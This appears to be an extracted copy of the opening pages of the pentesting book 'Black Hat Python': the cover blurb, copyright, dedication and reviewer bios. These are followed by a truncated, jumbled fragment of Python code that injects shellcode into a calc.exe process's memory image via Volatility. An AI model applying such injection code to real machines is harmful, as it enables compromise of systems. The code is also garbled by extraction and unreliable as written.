When it comes to creating powerful and effective hacking tools, Python is the language of choice for most security analysts But just how does the magic happen? Create a trojan command-and-control using GitHub Detect sandboxing and automate com­ mon malware tasks, like keylogging and screenshotting Escalate Windows privileges with creative process control Use offensive memory forensics tricks to retrieve password hashes and inject shellcode into a virtual machine Abuse Windows COM automation to perform a man-in-the-browser attack Exfiltrate data from a network most sneakily Insider techniques and creative challenges throughout show you how to extend the hacks and how to write your own exploits When it comes to offensive security, your ability to create powerful tools on the fly is indispensable Learn how in Black Hat Python About the Author Justin Seitz is a senior security researcher for Immunity, Inc., where he spends his time bug hunting, reverse engineering, writing exploits, and coding Python He is the author of Gray Hat Python (No Starch Press), the first book to cover Python for security analysis Black Hat Python Python Programming for Hackers and Pentesters Python Programming for Hackers and Pentesters In Black Hat Python, the latest from Justin Seitz (author of the best-selling Gray Hat Python), you’ll explore the darker side of Python’s capabilities—writing network sniffers, manipulating packets, infecting virtual machines, creating stealthy trojans, and more You’ll learn how to: Extend the popular Burp Suite webhacking tool Black Hat Python “The difference between script kiddies and professionals is the difference between merely using other people’s tools and writing your own.” — Charlie Miller, from the foreword T H E F I N E ST I N G E E K E N T E RTA I N M E N T ™ w w w.nostarch.com $34.95 ($36.95 CDN) Shelve In: Computers/Security ISBN: 978-1-59327-590-7 53495 781593 275907 89145 75900 Seitz Justin Seitz Foreword by Charlie Miller www.it-ebooks.info www.it-ebooks.info Black Hat Python www.it-ebooks.info www.it-ebooks.info Black Hat Python Python Programming for Hackers and Pentesters b y Ju s t in Se i t z San Francisco www.it-ebooks.info Black Hat Python Copyright © 2015 by Justin Seitz All rights reserved No part of this work may be reproduced or transmitted in any form or by any means, electronic or mechanical, including photocopying, recording, or by any information storage or retrieval system, without the prior written permission of the copyright owner and the publisher Printed in USA First printing 18 17 16 15 14   ISBN-10: 1-59327-590-0 ISBN-13: 978-1-59327-590-7 Publisher: William Pollock Production Editor: Serena Yang Cover Illustration: Garry Booth Interior Design: Octopod Studios Developmental Editor: Tyler Ortman Technical Reviewers: Dan Frisch and Cliff Janzen Copyeditor: Gillian McGarvey Compositor: Lynn L’Heureux Proofreader: James Fraleigh Indexer: BIM Indexing and Proofreading Services For information on distribution, translations, or bulk sales, please contact No Starch Press, Inc directly: No Starch Press, Inc 245 8th Street, San Francisco, CA 94103 phone: 415.863.9900; info@nostarch.com www.nostarch.com Library of Congress Control Number: 2014953241 No Starch Press and the No Starch Press logo are registered trademarks of No Starch Press, Inc Other product and company names mentioned herein may be the trademarks of their respective owners Rather than use a trademark symbol with every occurrence of a trademarked name, we are using the names only in an editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the trademark The information in this book is distributed on an “As Is” basis, without warranty While every precaution has been taken in the preparation of this work, neither the author nor No Starch Press, Inc shall have any liability to any person or entity with respect to any loss or damage caused or alleged to be caused directly or indirectly by the information contained in it www.it-ebooks.info To Pat Although we never met, I am forever grateful for every member of your wonderful family you gave me Canadian Cancer Society www.cancer.ca www.it-ebooks.info www.it-ebooks.info About the Author Justin Seitz is a senior security researcher for Immunity, Inc., where he spends his time bug hunting, reverse engineering, writing exploits, and coding Python He is the author of Gray Hat Python, the first book to cover Python for security analysis About the Technical Reviewers Dan Frisch has over ten years of experience in information security Currently, he is a senior security analyst in a Canadian law enforcement agency Prior to that role, he worked as a consultant providing security assessments to financial and technology firms in North America Because he is obsessed with technology and holds a 3rd degree black belt, you can assume (correctly) that his entire life is based around The Matrix Since the early days of Commodore PET and VIC-20, technology has been a constant companion (and sometimes an obsession!) to Cliff Janzen Cliff discovered his career passion when he moved to information security in 2008 after a decade of IT operations For the past few years Cliff has been happily employed as a security consultant, doing everything from policy review to penetration tests, and he feels lucky to have a career that is also his favorite hobby www.it-ebooks.info www.it-ebooks.info   address_space = process.get_process_address_space() pages = address_space.get_available_pages() We first instantiate a new PSList class  and pass in our current configuration The PSList module is responsible for walking through all of the running processes detected in the memory image We iterate over each process  and if we discover a calc.exe process, we obtain its full address space  and all of the process’s memory pages  Now we’re going to walk through the memory pages to find a chunk of memory the same size as our shellcode that’s filled with zeros As well, we’re looking for the virtual address of our = button handler so that we can write our trampoline Enter the following code, being mindful of the indentation for page in pages:  physical = address_space.vtop(page[0]) if physical is not None: if slack_space is None:   fd = open(memory_file,"r+") fd.seek(physical) buf = fd.read(page[1]) try: offset = buf.index("\x00" * len(sc)) slack_space = page[0] + offset print "[*] print "[*] print "[*] + offset) print "[*]   Found good shellcode location!" Virtual address: 0x%08x" % slack_space Physical address: 0x%08x" % (physical¬ Injecting shellcode." fd.seek(physical + offset) fd.write(sc) fd.flush() # create our trampoline tramp = "\xbb%s" % struct.pack("